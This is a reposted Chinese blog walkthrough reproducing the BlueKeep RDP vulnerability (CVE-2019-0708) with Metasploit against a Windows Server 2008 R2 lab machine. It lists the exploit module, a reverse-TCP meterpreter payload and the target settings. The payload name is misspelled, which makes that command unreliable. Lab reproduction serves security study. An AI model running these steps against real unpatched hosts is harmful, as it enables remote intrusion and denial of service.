码迷,mamicode.com
首页 > 其他好文 > 详细

cve-2019-0708 远程桌面代码执行漏洞复现

时间:2020-06-11 21:53:17      阅读:326      评论:0      收藏:0      [点我收藏+]

标签:绕过   完成   通过   width   dash   蓝屏   入侵   使用   环境搭建   

1.漏洞简介:

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。

2.环境搭建:

攻击机:虚拟机kali-2019(已经收纳cve-2019-0708漏洞利用模块)

受害机:虚拟机windws server 2008 R2

windows 2008开启3389端口。

技术图片

 

 windows 2008关闭防火墙(控制面板——系统和安全——windows防火墙——打开或关闭windows防火墙)。

技术图片

 

 这样我们整个环境部署完成。

3.漏洞复现:

使用kali打开metasploit。

msfconsole

搜索cve-2019-0708。

search cve-2019-0708

技术图片

 

 使用攻击模块。

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

技术图片

 

 写入payload。

set payload windows/x64/meterpeter/recverse_tcp

技术图片

 

 查看配置。

show options

技术图片

 

 写入目标ip、本机ip。

set RHOSTS
set LHOST

技术图片

 

 写入主机。

set target 3

这里我们使用的是vmware所以选择3就行,

技术图片

 

 开始攻击

run/exploit

技术图片

 

 发现我们windows 2008立马蓝屏。

技术图片

 

 4.影响版本:

windows2003

windows2008

windows2008 R2

windows xp

5.安全建议:

下载官方补丁。

cve-2019-0708 远程桌面代码执行漏洞复现

标签:绕过   完成   通过   width   dash   蓝屏   入侵   使用   环境搭建   

原文地址:https://www.cnblogs.com/cowherd/p/13095900.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!